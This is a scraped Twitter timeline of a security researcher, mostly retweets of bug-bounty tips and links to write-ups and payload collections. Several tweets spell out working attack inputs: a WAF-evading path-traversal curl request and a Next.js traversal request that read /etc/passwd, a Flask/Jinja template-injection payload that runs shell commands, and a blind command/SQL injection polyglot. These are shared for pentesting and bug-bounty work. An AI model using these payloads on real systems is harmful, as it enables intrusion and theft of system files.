Tweets
- Tweets, current page.
- Tweets & replies
- Media
You blocked @k_firsov
Are you sure you want to view these Tweets? Viewing Tweets won't unblock @k_firsov
-
Kirill Firsov Retweeted
Vulncode-DB – A vulnerable code database https://www.vulncode-db.com pic.twitter.com/phwe45Bt7c
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Kirill Firsov Retweeted
Want to bypass WAF when exploiting CVE-2019-5418 ? curl -H 'Accept: ../../../../../../e*c/p*s*d{{' http://server/...
Show this threadThanks. Twitter will use this info to make your timeline better. UndoUndo -
Kirill Firsov Retweeted
#infosec#bugbounty#bugbountytip#bugbountytips Wow, this is a great#SSTI payload for sites using Flask/Jinja: {{config.items()[4][1].__class__.__mro__[2].__subclasses__()[229]([\"touch /tmp/test\"], shell=True) }} Simple pythonic#RCE! Easiest Server-Side Template Injection.Thanks. Twitter will use this info to make your timeline better. UndoUndo -
«Best price guarantee» in
#QatarAirways really works! Thank you@qatarairwaysThanks. Twitter will use this info to make your timeline better. UndoUndo -
Kirill Firsov Retweeted
React Framework - Arbitrary File Reading in Next.js < 2.4.1 NodeJS server transforms backslashes into forward slashes, so we can bypass nginx validation. GET /_next\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 …
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Kirill Firsov Retweeted
Today i made for fun a
#polyglot that combines blind command injection and blind sql injection ( mysql ) in one payload: /*$(sleep 5)`sleep 5``*/sleep(5)#'/*$(sleep 5)`sleep 5` #*/||sleep(5)||'"||sleep(5)||"`#sqli is 5 seconds delay and#RCE 10 seconds#BugBounty#bugbountytipShow this threadThanks. Twitter will use this info to make your timeline better. UndoUndo -
Kirill Firsov Retweeted
Awesome Burp Extensions:- Scanners Custom Features Beautifiers and Decoders Cloud Security Scripting OAuth and SSO Information Gathering Web Application Firewall Evasion Logging and Notes Payload Generators and Fuzzers AND MOORE. https://github.com/snoopysecurity/awesome-burp-extensions …pic.twitter.com/bolAYlMju7
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Hey
@qatarairways@qrsupport . I have no response for a one week for your «Best price guarantee» service.Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Kirill Firsov Retweeted
For Pentesters and CTF players, here’s a list of useful payloads and bypasses, covering various WebApp attacks. There are a lot of similar GitHub repos out there. What’s your personal favorite? https://github.com/swisskyrepo/PayloadsAllTheThings …pic.twitter.com/8L5zgwGuI8
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Kirill Firsov Retweeted
For anyone learning about SPF, DKIM and DMARC, this post has amazing insight. https://www.reddit.com/r/sysadmin/comments/aph6ee/lets_talk_about_email_spoofing_and_prevention_alt/ …
#office365#spf#dkim#dmarcThanks. Twitter will use this info to make your timeline better. UndoUndo -
Kirill Firsov Retweeted
How to bypass Instagram SSL Pinning on Android (v78)https://plainsec.org/how-to-bypass-instagram-ssl-pinning-on-android-v78/ …
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
You can check any email address for mail forwarding at http://keep.google.com , add some note and add 123@gmail.com to it.
Show this threadThanks. Twitter will use this info to make your timeline better. UndoUndo -
Thanks. Twitter will use this info to make your timeline better. UndoUndo
-
Kirill Firsov Retweeted
Publishing my another writeup . How I could steal bitcoin wallet backups from http://blockchain.info
#bugbounty http://blog.shashank.co/2017/11/stealing-bitcoin-wallet-backups-from.html …Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Kirill Firsov Retweeted
Messing with the Google Buganizer System for $15,600 in Bountieshttps://medium.com/@alex.birsan/messing-with-the-google-buganizer-system-for-15-600-in-bounties-58f86cc9f9a5 …
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Kirill Firsov Retweeted
PHPMailer < 5.2.21 - Local File Disclosure
https://www.exploit-db.com/exploits/43056/ pic.twitter.com/6yf15SumiH
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Kirill Firsov Retweeted
I just published “The best Burp plugin I’ve ever seen”https://medium.com/p/the-best-burp-plugin-ive-ever-seen-2d17780342 …
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Kirill Firsov Retweeted
Spoofing e-mail is easy, here is how to break DKIM signature http://noxxi.de/research/breaking-dkim-on-purpose-and-by-chance.html …
#phishing#DKIMpic.twitter.com/m4uy79ejLK
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Kirill Firsov Retweeted
Another router/IoT that got pwned, this time the Dlink 850L: XSS, auth bypass, RCE, default private keys, etc.
https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html …pic.twitter.com/cr0XFwdEec
Thanks. Twitter will use this info to make your timeline better. UndoUndo -
Solved the final
#labyrenth2017 challenge on 4th place, almost a winner, almost a millionaireThanks. Twitter will use this info to make your timeline better. UndoUndo
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.